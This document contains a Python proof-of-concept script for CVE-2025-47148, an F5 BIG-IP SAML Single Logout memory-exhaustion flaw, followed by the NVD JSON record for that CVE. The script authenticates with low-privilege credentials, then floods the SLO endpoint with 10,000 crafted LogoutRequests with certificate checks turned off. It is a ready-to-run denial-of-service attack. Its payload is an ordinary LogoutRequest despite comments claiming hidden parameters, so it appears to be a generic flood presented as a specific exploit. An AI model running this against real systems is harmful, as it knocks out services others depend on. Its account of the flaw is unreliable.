CVE-2025-47148

# CVE-2025-47148 PoC - F5 BIG-IP SAML SLO Memory Exhaustion # This PoC demonstrates how to trigger memory resource exhaustion # by sending crafted SAML Single Logout (SLO) requests to a vulnerable # BIG-IP system configured as both SAML SP and IdP. import requests import base64 import time import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Target BIG-IP system configuration TARGET_URL = "https://bigip-target.example.com" SAML_SLO_ENDPOINT = "/saml/sp/slo" # SAML SLO endpoint USERNAME = "attacker_user" # Low-privilege authenticated user PASSWORD = "attacker_password" def create_malicious_slo_request(session_id): """ Create a malformed SAML LogoutRequest that triggers memory leak. The request contains undisclosed parameters that cause BIG-IP to allocate memory without proper cleanup. """ # Craft SAML LogoutRequest XML with malicious attributes logout_request = f"""<?xml version="1.0" encoding="UTF-8"?> <samlp:LogoutRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_{session_id}" Version="2.0" IssueInstant="{time.strftime('%Y-%m-%dT%H:%M:%SZ')}" Destination="{TARGET_URL}{SAML_SLO_ENDPOINT}"> <saml:Issuer>malicious_sp</saml:Issuer> <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress"> [email protected] </saml:NameID> <samlp:SessionIndex>{session_id}</samlp:SessionIndex> </samlp:LogoutRequest>""" # Base64 encode the SAML request encoded_request = base64.b64encode(logout_request.encode('utf-8')).decode('utf-8') return encoded_request def authenticate_and_get_session(): """ Authenticate to BIG-IP with low-privilege credentials to obtain session. Required because the vulnerability needs PR:L (Low privileges). """ session = requests.Session() login_data = { "username": USERNAME, "password": PASSWORD } response = session.post(f"{TARGET_URL}/mgmt/shared/authn/login", json=login_data, verify=False) if response.status_code == 200: print(f"[+] Authenticated successfully") return session else: print(f"[-] Authentication failed: {response.status_code}") return None def exploit_memory_exhaustion(session): """ Send repeated malicious SLO requests to exhaust memory resources. Each request causes memory allocation without proper cleanup. """ print("[*] Starting memory exhaustion attack...") count = 0 for i in range(10000): # Send many requests session_id = f"malicious_session_{i}_{int(time.time())}" encoded_slo = create_malicious_slo_request(session_id) # Send the malicious SLO request params = { "SAMLRequest": encoded_slo, "RelayState": "malicious_relay_state" } try: response = session.post( f"{TARGET_URL}{SAML_SLO_ENDPOINT}", params=params, verify=False, timeout=10 ) count += 1 if count % 100 == 0: print(f"[*] Sent {count} malicious SLO requests...") except requests.exceptions.RequestException as e: print(f"[!] Request failed (possible service degradation): {e}") break print(f"[+] Attack complete. Sent {count} requests total.") if __name__ == "__main__": print("=" * 60) print("CVE-2025-47148 - F5 BIG-IP SAML SLO Memory Exhaustion PoC") print("=" * 60) # Step 1: Authenticate with low-privilege credentials session = authenticate_and_get_session() if session: # Step 2: Exploit the vulnerability exploit_memory_exhaustion(session)

{"cve": {"id": "CVE-2025-47148", "sourceIdentifier": "[email protected]", "published": "2025-10-15T14:15:47.637", "lastModified": "2025-10-21T18:53:54.733", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "When the BIG-IP system is configured as both a Security Assertion Markup Language (SAML) service provider (SP) and Identity Provider (IdP), with single logout (SLO) enabled on an access policy, undisclosed requests can cause an increase in memory resource utilization.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-404"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "A7A0C1CA-EDEF-463F-B7C8-8B9E67239FC1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "16.1.0", "versionEndExcluding": "16.1.6.1", "matchCriteriaId": "6494E2A7-1473-46C0-97F8-90827D9466AA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "17.1.0", "versionEndExcluding": "17.1.3", "matchCriteriaId": "96D35435-27A7-4A88-9432-1F5AB0112B8C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_access_policy_manager:17.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "369D38E2-62B5-47C4-B606-7A2DD866133C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_ssl_orchestrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "40B87228-F144-41C7-ACD8-1168CC5C57F3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_ssl_orchestrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "16.1.0", "versionEndExcluding": "16.1.6.1", "matchCriteriaId": "7829108D-71A4-4F91-81F6-804E9EB1AE9D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_ssl_orchestrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "17.1.0", "versionEndExcluding": "17.1.3", "matchCriteriaId": "581B1484-C457-4C11-B43A-DCF49EBC07DA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_ssl_orchestrator:17.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "29BF7E7D-7E43-4937-9F68-3F9448590D72"}]}]}], "references": [{"url": "https://my.f5.com/manage/s/article/K000148816", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}